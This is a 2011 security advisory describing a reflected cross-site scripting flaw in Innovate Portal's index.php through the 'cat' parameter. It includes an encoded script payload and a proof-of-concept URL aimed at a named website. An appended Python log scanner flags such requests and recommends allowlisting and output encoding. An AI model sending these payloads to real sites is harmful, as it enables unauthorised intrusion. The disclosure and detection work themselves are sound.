Innovate Portal suffers from a cross-site scripting vulnerability.
# Exploit Title: Innovate Portal XSS Vulnerability
# Date: 2011
# Author: Eyup CELIK
# Version: All versions
# Tested on: All versions are vulnerable
# Web Site: www.eyupcelik.com.tr
ISSUE
Script code can be injected through the cat request parameter.
Vulnerable Page:
index.php
Example:
index.php?cat=<XSS Code>&content=error&sid=57cdbb83e0ab1b879e0a0f91fbf22781&what=user_notfound
Exploit:
index.php?cat='"()%26%251<ScRiPt >prompt(948044)<%2fScRiPt>&content=error&sid=57cdbb83e0ab1b879e0a0f91fbf22781&what=user_notfound
POC:
http://www.innovate-board.de/index.php?cat=%27%22%28%29%26%251%3cScRiPt%20%3eprompt%28948044%29%3c%2fScRiPt%3e&content=error&sid=57cdbb83e0ab1b879e0a0f91fbf22781&what=user_notfound
Thanks,
Eyup CELIK
Information Technology Security Specialist
http://www.eyupcelik.com.tr
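
Added example, not part of the original advisory and not Innovate Portal code: a log check that flags index.php requests whose cat parameter, after percent-decoding (including double encoding), falls outside an allowlist. The allowlist pattern, the function names and the sample log lines are assumptions made for illustration.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Assumption: legitimate cat values are short identifiers (letters, digits, _ and -).
SAFE_CAT = re.compile(r"[A-Za-z0-9_-]{1,64}")
# Request line inside a combined-format access log entry.
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

# Constructed sample log: line 1 is benign, line 2 carries the advisory's PoC
# request, line 3 is a double-encoded markup value, line 4 targets another page.
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2011:10:00:00 +0000] "GET /index.php?cat=news&content=list HTTP/1.1" 200 5120',
    '192.0.2.11 - - [01/Jan/2011:10:00:05 +0000] "GET /index.php?cat=%27%22%28%29%26%251%3cScRiPt%20%3eprompt%28948044%29%3c%2fScRiPt%3e&content=error&sid=57cdbb83e0ab1b879e0a0f91fbf22781&what=user_notfound HTTP/1.1" 200 3011',
    '192.0.2.12 - - [01/Jan/2011:10:00:09 +0000] "GET /index.php?cat=%253Cb%253E&content=error HTTP/1.1" 200 3011',
    '192.0.2.13 - - [01/Jan/2011:10:00:12 +0000] "GET /other.php?cat=%3Cb%3E HTTP/1.1" 404 210',
]

def decode_fully(value, max_rounds=3):
    """Undo repeated percent-encoding (e.g. %253c -> %3c -> <)."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def suspicious_cat(log_line):
    """Return the decoded cat value if it breaks the allowlist, else None."""
    match = REQUEST.search(log_line)
    if not match:
        return None
    url = urlsplit(match.group(1))
    if not url.path.endswith("index.php"):
        return None
    # parse_qs splits on raw '&' and performs the first round of decoding.
    for raw in parse_qs(url.query).get("cat", []):
        value = decode_fully(raw)
        if not SAFE_CAT.fullmatch(value):
            return value
    return None

def scan(lines):
    """Return (line number, decoded cat value) for every flagged entry."""
    hits = [(n, suspicious_cat(line)) for n, line in enumerate(lines, start=1)]
    return [(n, value) for n, value in hits if value is not None]

if __name__ == "__main__":
    for number, value in scan(SAMPLE_LOG):
        print(f"line {number}: cat={value!r}")
```

The same allowlist, enforced server-side before cat is written into the error page, is the corresponding input-validation fix; HTML-encoding the value on output covers anything the allowlist lets through.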